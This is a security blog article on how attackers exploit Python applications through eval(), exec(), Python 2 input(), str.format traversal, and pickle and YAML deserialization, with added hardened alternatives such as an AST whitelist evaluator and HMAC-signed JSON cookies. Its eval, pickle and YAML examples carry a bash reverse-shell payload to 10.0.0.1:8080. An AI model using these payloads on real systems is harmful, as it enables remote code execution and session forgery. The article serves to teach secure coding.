Hacking Python Applications

And how attackers exploit common programming pitfalls to gain control

Vickie Li
Nov 15, 2019 · 7 min read

Exploiting dangerous functions: eval(), exec() and input()

Eval()

from flask import request  # assumed: a Flask request object supplying request.json

def addition(a, b):
    # the two request values are interpolated straight into eval()
    return eval("%s + %s" % (a, b))

result = addition(request.json['a'], request.json['b'])
print("The result is %d." % result)

Expected request body:

{"a":"1", "b":"2"}

Request body that makes eval() run attacker-supplied code instead (the trailing # comments out the rest of the string):

{"a":"__import__('os').system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')#", "b":"2"}

Exec()

from flask import request  # assumed: a Flask request object supplying request.json

def addition(a, b):
    # exec() runs the string as statements; it always returns None, so nothing comes back to the caller
    return exec("%s + %s" % (a, b))

addition(request.json['a'], request.json['b'])

Input()

# Python 2: input() evaluates the typed text as an expression (it is eval(raw_input()))
# get_user_pass() and login() are the application's own helpers (not shown)
user_pass = get_user_pass("admin")
if user_pass == input("Please enter your password"):
    login()
else:
    print "Password is incorrect!"

# Typing the expression user_pass at the prompt turns the comparison into:
if user_pass == user_pass:  # this will evaluate as true
# Typing get_user_pass("admin") at the prompt turns it into:
if user_pass == get_user_pass("admin"):  # this will also evaluate as true
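The defensive counterpart to all three pitfalls is the same: user input never reaches eval(), exec() or Python 2's input() (which is eval(raw_input()); raw_input() returns the text untouched). Where the application only needs numbers, int() or float() are enough. Where it genuinely has to evaluate arithmetic typed by a user, the expression can be parsed with the ast module and walked against a whitelist of node types, so that names, calls and attribute access such as __import__('os').system(...) are refused before anything runs. The evaluator below is an added example written for this post, not code from the original article; safe_eval, is_safe_expression and _eval_node are my own names, and addition() keeps the article's interface.

```python
import ast
import operator

# Added example, not code from the original post: a whitelist evaluator that replaces
# eval("%s + %s" % (a, b)). Only numeric literals and the operators listed below are
# accepted; names, calls and attribute access (e.g. __import__('os').system(...)) are
# rejected by inspecting the parse tree, before anything is evaluated.

_BINARY_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}
_UNARY_OPS = {
    ast.USub: operator.neg,
    ast.UAdd: operator.pos,
}


def _eval_node(node):
    """Evaluate one AST node, raising ValueError for anything outside the whitelist."""
    if isinstance(node, ast.Constant):
        # bool is a subclass of int; keep the evaluator strictly numeric
        if isinstance(node.value, (int, float)) and not isinstance(node.value, bool):
            return node.value
        raise ValueError("only numeric literals are allowed, got %r" % (node.value,))
    if isinstance(node, ast.BinOp) and type(node.op) in _BINARY_OPS:
        return _BINARY_OPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    # Name, Call, Attribute, Subscript, ...: everything eval() would happily execute
    raise ValueError("disallowed expression element: %s" % type(node).__name__)


def safe_eval(expression):
    """Evaluate a user-supplied arithmetic expression without eval()."""
    try:
        tree = ast.parse(expression, mode="eval")
    except SyntaxError as exc:
        raise ValueError("not a valid expression: %s" % exc)
    return _eval_node(tree.body)


def is_safe_expression(expression):
    """True if safe_eval() accepts the expression, False if it refuses it."""
    try:
        safe_eval(expression)
        return True
    except ValueError:
        return False


def addition(a, b):
    """Same interface as the post's addition(), with the eval() call replaced."""
    return safe_eval("%s + %s" % (a, b))


if __name__ == "__main__":
    print(addition("1", "2"))
    print(is_safe_expression("__import__('os').system('id')#"))
```

Power is deliberately missing from the operator table: an expression like 9**9**9 is harmless to parse but would exhaust memory when evaluated, so a whitelist should also be judged by what it lets a user make the interpreter compute, not only by what it lets them call.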

Exploiting string formatting

CONFIG = {
    "API_KEY": "771df488714111d39138eb60df756e6b"
    # some program secrets that users should not be able to read
}

class Person(object):
    def __init__(self, name):
        self.name = name

def print_nametag(format_string, person):
    return format_string.format(person=person)

new_person = Person("Vickie")
print_nametag(input("Please format your nametag!"), new_person)

Intended use:

print_nametag("Hi, my name is {person.name}. I am a {person.__class__.__name__}.", new_person)
"Hi, my name is Vickie. I am a Person."

A format string that walks from the object, through its __init__ method's globals, to the module-level CONFIG dictionary:

print_nametag("{person.__init__.__globals__[CONFIG][API_KEY]}", new_person)
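The leak works because str.format() resolves attribute and index chains on whatever object the template receives. Two changes close it: hand the template plain values rather than the object, and format with a string.Formatter subclass that refuses dotted and indexed fields altogether. The code below is an added example, not the article's own code; CONFIG, Person and the vulnerable function reproduce the article's setup so the two behaviours can be compared, while SafeFormatter, safe_nametag and template_is_accepted are my own names.

```python
import string

# Added example, not code from the original post. CONFIG, Person and vulnerable_nametag()
# mirror the post; SafeFormatter and safe_nametag() are the hardened form.
CONFIG = {
    "API_KEY": "771df488714111d39138eb60df756e6b",  # secret from the post; a template must not reach it
}


class Person(object):
    def __init__(self, name):
        self.name = name


def vulnerable_nametag(format_string, person):
    # The post's function: a user-controlled template receives the whole object and can
    # walk person.__init__.__globals__ to this module's CONFIG
    return format_string.format(person=person)


class SafeFormatter(string.Formatter):
    """str.format() replacement that resolves only the named values it is handed."""

    def get_field(self, field_name, args, kwargs):
        # "{x.attr}" and "{x[key]}" both traverse objects: refuse them before any lookup
        if "." in field_name or "[" in field_name:
            raise ValueError("attribute/index access not allowed in template field {%s}" % field_name)
        return super().get_field(field_name, args, kwargs)

    def get_value(self, key, args, kwargs):
        # Positional fields ({0}, {}) are refused too, so only explicit keyword values resolve;
        # an unknown keyword name raises KeyError from the base class
        if isinstance(key, int):
            raise ValueError("positional template fields are not allowed")
        return super().get_value(key, args, kwargs)


def safe_nametag(format_string, person):
    # Pass plain strings, never the object, and format with the restricted formatter
    return SafeFormatter().format(format_string, name=person.name, kind=type(person).__name__)


def template_is_accepted(format_string, person):
    """True if safe_nametag() renders the template, False if it refuses it."""
    try:
        safe_nametag(format_string, person)
        return True
    except (ValueError, KeyError):
        return False


if __name__ == "__main__":
    vickie = Person("Vickie")
    print(safe_nametag("Hi, my name is {name}. I am a {kind}.", vickie))
    print(template_is_accepted("{person.__init__.__globals__[CONFIG][API_KEY]}", vickie))
```

Passing plain strings alone is not sufficient: a template can still write {name.__class__} against a str value, so the formatter-level refusal is what makes the template language attribute-free.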

Exploiting Pickle deserialization

import pickle

class Person:
    def __init__(self, name):
        self.name = name

new_person = Person("Vickie")
print(pickle.dumps(new_person))
b'\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\x06\x00\x00\x00Vickieq\x04sb.'

print(pickle.loads(b'\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\x06\x00\x00\x00Vickieq\x04sb.').name)
# -> prints "Vickie"

Authentication bypass

import base64
import pickle

# Server side: the session cookie is a base64-encoded pickle of a Person object
class Person:
    def __init__(self, name):
        self.name = name

new_person = Person("Vickie")
session_cookie = base64.b64encode(pickle.dumps(new_person))

# Client side: with the same class definition, a cookie naming a different user is just as easy to produce
class Person:
    def __init__(self, name):
        self.name = name

new_person = Person("Admin")
session_cookie = base64.b64encode(pickle.dumps(new_person))

Code Execution

A class's __reduce__() method tells pickle how to rebuild the object; it returns a tuple of the form:

(callable object that will be called to instantiate the new object,
 a tuple of arguments for that callable object)

import base64
import os
import pickle

class Malicious:
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1',))

fake_object = Malicious()
session_cookie = base64.b64encode(pickle.dumps(fake_object))

When the server unpickles this cookie, it invokes the callable with the stored arguments:

os.system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')
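The pickle documentation's answer to this is a pickle.Unpickler subclass whose find_class() only resolves an explicit allow-list of (module, name) pairs; the __reduce__ gadget above works precisely because a plain loads() will resolve os.system for the attacker. The code below is an added example, not the article's code: Person is the article's class, Gadget stands in for the article's Malicious class but names a harmless callable (os.getcwd) so the refusal can be exercised without a shell, and RestrictedUnpickler, restricted_loads, loads_is_refused, pickled_person and pickled_gadget are my own names. Note what the allow-list does not do: a pickled Person("Admin") still loads, so an allow-list stops code execution but cannot stop the authentication bypass; that needs the cookie to be signed.

```python
import io
import os
import pickle

# Added example, not code from the original post: a pickle.Unpickler whose find_class()
# only resolves names on an explicit allow-list. Person is the post's class; Gadget stands
# in for the post's Malicious class with a harmless callable (os.getcwd) so the mechanism
# can be shown without running a shell.


class Person:
    def __init__(self, name):
        self.name = name


class Gadget:
    def __reduce__(self):
        # Any callable named here is invoked by a plain pickle.loads()
        return (os.getcwd, ())


# (module, name) pairs the unpickler may resolve; __name__ covers both running this file
# directly (__main__) and importing it. Nothing from os, posix or subprocess is listed.
ALLOWED_GLOBALS = {(__name__, "Person")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("refusing to resolve %s.%s" % (module, name))


def restricted_loads(data):
    """pickle.loads() replacement that refuses every global outside ALLOWED_GLOBALS."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def pickled_person(name):
    return pickle.dumps(Person(name))


def pickled_gadget():
    return pickle.dumps(Gadget())


def loads_is_refused(data):
    """True if restricted_loads() rejects the data, False if it reconstructs an object."""
    try:
        restricted_loads(data)
        return False
    except pickle.UnpicklingError:
        return True


if __name__ == "__main__":
    print(restricted_loads(pickled_person("Vickie")).name)
    print(loads_is_refused(pickled_gadget()))  # the os.getcwd reference is refused
```

The allow-list has to be reviewed with the same care as the gadget chain it blocks: every class on it is a class the client may instantiate with arbitrary state, so the safest list is the shortest one, and for session cookies the better answer is not to unpickle client data at all.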

Exploiting YAML parsing

import yaml

class Person:
    def __init__(self, name):
        self.name = name

new_person = Person("Vickie")
print(yaml.dump(new_person))
!!python/object:__main__.Person {name: Vickie}

# yaml.load() reconstructs the tagged Python object from the document. Before PyYAML 5.1 this
# was the default behaviour; in later versions the same happens with Loader=yaml.Loader or yaml.UnsafeLoader
yaml.load(YAML_FILE)

Authentication bypass

import base64
import yaml

# Server side: the session cookie is the base64-encoded YAML dump of a Person object
class Person:
    def __init__(self, name):
        self.name = name

new_person = Person("Vickie")
session_cookie = base64.b64encode(yaml.dump(new_person).encode())

# Client side: a cookie naming a different user is just as easy to produce
class Person:
    def __init__(self, name):
        self.name = name

new_person = Person("Admin")
session_cookie = base64.b64encode(yaml.dump(new_person).encode())

Code Execution

!!python/object/apply:os.system ["bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"]
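Both the pickle and the YAML session cookies fail for the same two reasons: the server trusts whatever the client sends back (so "Admin" is as good as "Vickie"), and the format can describe a Python object to construct (so os.system is as good as Person). The usual fix addresses both at once: store session data as JSON, which json.loads can only ever turn into dicts, lists, strings and numbers, and sign it with an HMAC so a cookie that was not produced with the server's key is rejected before it is parsed. For YAML files the application has to read, yaml.safe_load() refuses the !!python/... tags. The code below is an added example written for this post, not the article's code; SECRET_KEY is a constructed placeholder, and make_session_cookie, load_session_cookie and swap_cookie_body are my own names.

```python
import base64
import hashlib
import hmac
import json

# Added example, not code from the original post: a session cookie that carries JSON
# instead of a pickle or YAML object and is signed with an HMAC, so the client can
# neither forge a cookie for another user nor smuggle in a deserialization payload.
# SECRET_KEY is a constructed placeholder; a deployment loads its key from configuration.
SECRET_KEY = b"constructed-example-key-do-not-reuse"


def _b64encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64decode(encoded):
    return base64.urlsafe_b64decode(encoded + b"=" * (-len(encoded) % 4))


def _sign(body, key):
    return hmac.new(key, body, hashlib.sha256).digest()


def make_session_cookie(session, key=SECRET_KEY):
    """Encode a dict as body.signature; only a holder of the key can produce a valid signature."""
    body = _b64encode(json.dumps(session, sort_keys=True, separators=(",", ":")).encode())
    return (body + b"." + _b64encode(_sign(body, key))).decode()


def load_session_cookie(cookie, key=SECRET_KEY):
    """Return the session dict, or None if the cookie is malformed or its signature fails."""
    try:
        body, sig = cookie.encode().split(b".", 1)
        presented = _b64decode(sig)
    except (ValueError, TypeError):
        return None
    # Compare in constant time so timing does not leak how many signature bytes matched
    if not hmac.compare_digest(_sign(body, key), presented):
        return None
    try:
        session = json.loads(_b64decode(body))
    except ValueError:
        return None
    # json.loads only yields dicts, lists, strings and numbers: there is no object
    # reconstruction step for a __reduce__ gadget or a !!python/object tag to hook into
    return session if isinstance(session, dict) else None


def swap_cookie_body(cookie, session):
    """Keep a cookie's signature but replace its body; used below to show tampering is caught."""
    _, sig = cookie.split(".", 1)
    return _b64encode(json.dumps(session).encode()).decode() + "." + sig


if __name__ == "__main__":
    cookie = make_session_cookie({"name": "Vickie"})
    print(load_session_cookie(cookie))
    print(load_session_cookie(swap_cookie_body(cookie, {"name": "Admin"})))  # None
```

The signature is checked before the body is decoded, so malformed or tampered data never reaches the parser, and the comparison uses hmac.compare_digest rather than ==, so the time the check takes does not depend on how much of a guessed signature happens to be right.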

Other dangerous when developing in Python

The Startup

Written by

Vickie Li

Professional investigator of nerdy stuff. Hacks and secures. Creates god awful infographics. https://twitter.com/vickieli7
